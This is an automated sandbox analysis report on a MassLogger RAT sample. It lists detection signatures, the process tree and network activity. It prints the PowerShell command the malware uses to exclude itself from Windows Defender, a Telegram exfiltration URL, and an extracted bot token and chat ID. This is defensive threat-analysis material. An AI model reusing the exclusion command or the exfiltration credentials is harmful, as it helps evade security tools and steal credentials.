Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rPO2400525.exe

Overview

General Information

Sample name:rPO2400525.exe
Analysis ID:1618720
MD5:9393c3e2268fe4c15da55f0d5233245d
SHA1:ecc0ea51def475cd0facc10c5911c0546d6cd835
SHA256:8ea6427ed08636f4220611662424cdf09103fecdb4ef6a0c15103c715364fbf3
Tags:exeuser-Porcupine
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rPO2400525.exe (PID: 6200 cmdline: "C:\Users\user\Desktop\rPO2400525.exe" MD5: 9393C3E2268FE4C15DA55F0D5233245D)
    • powershell.exe (PID: 6984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7164 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • rPO2400525.exe (PID: 2380 cmdline: "C:\Users\user\Desktop\rPO2400525.exe" MD5: 9393C3E2268FE4C15DA55F0D5233245D)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7215906847:AAG2SKPaqtwpEVHnMRasOy3MDdNuuViSz-U", "Telegram Chatid": "1984300162"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0xf815:$a1: get_encryptedPassword
      • 0xfb3d:$a2: get_encryptedUsername
      • 0xf5a2:$a3: get_timePasswordChanged
      • 0xf6c3:$a4: get_passwordField
      • 0xf82b:$a5: set_encryptedPassword
      • 0x11189:$a7: get_logins
      • 0x10e3a:$a8: GetOutlookPasswords
      • 0x10c2c:$a9: StartKeylogger
      • 0x110d9:$a10: KeyLoggerEventArgs
      • 0x10c89:$a11: KeyLoggerEventArgsEventHandler
      00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
        00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Click to see the 8 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.rPO2400525.exe.3650f90.4.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            0.2.rPO2400525.exe.3650f90.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              0.2.rPO2400525.exe.3650f90.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0xdc15:$a1: get_encryptedPassword
              • 0xdf3d:$a2: get_encryptedUsername
              • 0xd9a2:$a3: get_timePasswordChanged
              • 0xdac3:$a4: get_passwordField
              • 0xdc2b:$a5: set_encryptedPassword
              • 0xf589:$a7: get_logins
              • 0xf23a:$a8: GetOutlookPasswords
              • 0xf02c:$a9: StartKeylogger
              • 0xf4d9:$a10: KeyLoggerEventArgs
              • 0xf089:$a11: KeyLoggerEventArgsEventHandler
              0.2.rPO2400525.exe.3650f90.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x12d8d:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x1228b:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x12599:$a4: \Orbitum\User Data\Default\Login Data
              • 0x13391:$a5: \Kometa\User Data\Default\Login Data
              5.2.rPO2400525.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                Click to see the 15 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO2400525.exe", ParentImage: C:\Users\user\Desktop\rPO2400525.exe, ParentProcessId: 6200, ParentProcessName: rPO2400525.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", ProcessId: 6984, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO2400525.exe", ParentImage: C:\Users\user\Desktop\rPO2400525.exe, ParentProcessId: 6200, ParentProcessName: rPO2400525.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", ProcessId: 6984, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO2400525.exe", ParentImage: C:\Users\user\Desktop\rPO2400525.exe, ParentProcessId: 6200, ParentProcessName: rPO2400525.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe", ProcessId: 6984, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-19T04:01:19.392226+010028032742Potentially Bad Traffic192.168.2.549706193.122.130.080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7215906847:AAG2SKPaqtwpEVHnMRasOy3MDdNuuViSz-U", "Telegram Chatid": "1984300162"}
                Multi AV Scanner detection for submitted file
                Source: rPO2400525.exeVirustotal: Detection: 23%Perma Link
                Source: rPO2400525.exeReversingLabs: Detection: 21%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: rPO2400525.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49708 version: TLS 1.0
                Source: rPO2400525.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 01389731h5_2_01389480
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 01389E5Ah5_2_01389A40
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 01389E5Ah5_2_01389A30
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 01389E5Ah5_2_01389D87
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A8830h5_2_058A8588
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A47C9h5_2_058A4520
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A76D0h5_2_058A7428
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058AF700h5_2_058AF458
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058AE9F8h5_2_058AE750
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A5929h5_2_058A5680
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058AE5A0h5_2_058AE180
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A83D8h5_2_058A8130
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058AF2A8h5_2_058AF000
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A7278h5_2_058A720E
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A54D1h5_2_058A5228
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A5079h5_2_058A4DD0
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A7F80h5_2_058A7CD8
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A4C21h5_2_058A4978
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A7B28h5_2_058A7880
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058AFB58h5_2_058AF8B0
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058AEE50h5_2_058AEBA8
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 4x nop then jmp 058A5E15h5_2_058A5AD8
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.130.0:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49708 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002D43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                Source: rPO2400525.exe, 00000000.00000002.2084107935.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to log keystrokes (.Net Source)
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 0_2_009EDA5C0_2_009EDA5C
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_0138C5305_2_0138C530
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_013827B95_2_013827B9
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_01382DD15_2_01382DD1
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_013894805_2_01389480
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_0138C4AA5_2_0138C4AA
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_0138946F5_2_0138946F
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A61385_2_058A6138
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058ABC605_2_058ABC60
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AAF005_2_058AAF00
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A89E05_2_058A89E0
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A85885_2_058A8588
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A450F5_2_058A450F
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A45205_2_058A4520
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A85795_2_058A8579
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A74185_2_058A7418
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A74285_2_058A7428
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AF4485_2_058AF448
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AF4585_2_058AF458
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AE7405_2_058AE740
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AE7505_2_058AE750
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A56805_2_058A5680
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AE1805_2_058AE180
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A612A5_2_058A612A
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A81205_2_058A8120
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A81305_2_058A8130
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AF0005_2_058AF000
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A13A85_2_058A13A8
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A03205_2_058A0320
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A03305_2_058A0330
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A521A5_2_058A521A
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A52285_2_058A5228
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A4DC05_2_058A4DC0
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A4DD05_2_058A4DD0
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A7CC85_2_058A7CC8
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A0CD85_2_058A0CD8
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A7CD85_2_058A7CD8
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A6FC35_2_058A6FC3
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A6FD05_2_058A6FD0
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AEFF05_2_058AEFF0
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A89D05_2_058A89D0
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A49695_2_058A4969
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A49785_2_058A4978
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A78805_2_058A7880
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AF8A15_2_058AF8A1
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AF8B05_2_058AF8B0
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A78715_2_058A7871
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AEB985_2_058AEB98
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058AEBA85_2_058AEBA8
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A0AB85_2_058A0AB8
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A5ACA5_2_058A5ACA
                Source: C:\Users\user\Desktop\rPO2400525.exeCode function: 5_2_058A5AD85_2_058A5AD8
                Source: rPO2400525.exe, 00000000.00000002.2083171797.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rPO2400525.exe
                Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs rPO2400525.exe
                Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs rPO2400525.exe
                Source: rPO2400525.exe, 00000000.00000000.2069830343.0000000000242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRjYY.exeH vs rPO2400525.exe
                Source: rPO2400525.exe, 00000000.00000002.2101219919.0000000006B00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs rPO2400525.exe
                Source: rPO2400525.exe, 00000000.00000002.2084107935.00000000027EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs rPO2400525.exe
                Source: rPO2400525.exe, 00000000.00000002.2096199828.0000000003E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs rPO2400525.exe
                Source: rPO2400525.exe, 00000000.00000002.2099989799.0000000005060000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs rPO2400525.exe
                Source: rPO2400525.exe, 00000005.00000002.3322178441.0000000000BD7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rPO2400525.exe
                Source: rPO2400525.exe, 00000005.00000002.3321986255.000000000041A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs rPO2400525.exe
                Source: rPO2400525.exeBinary or memory string: OriginalFilenameRjYY.exeH vs rPO2400525.exe
                Source: rPO2400525.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rPO2400525.exe.3650f90.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.rPO2400525.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
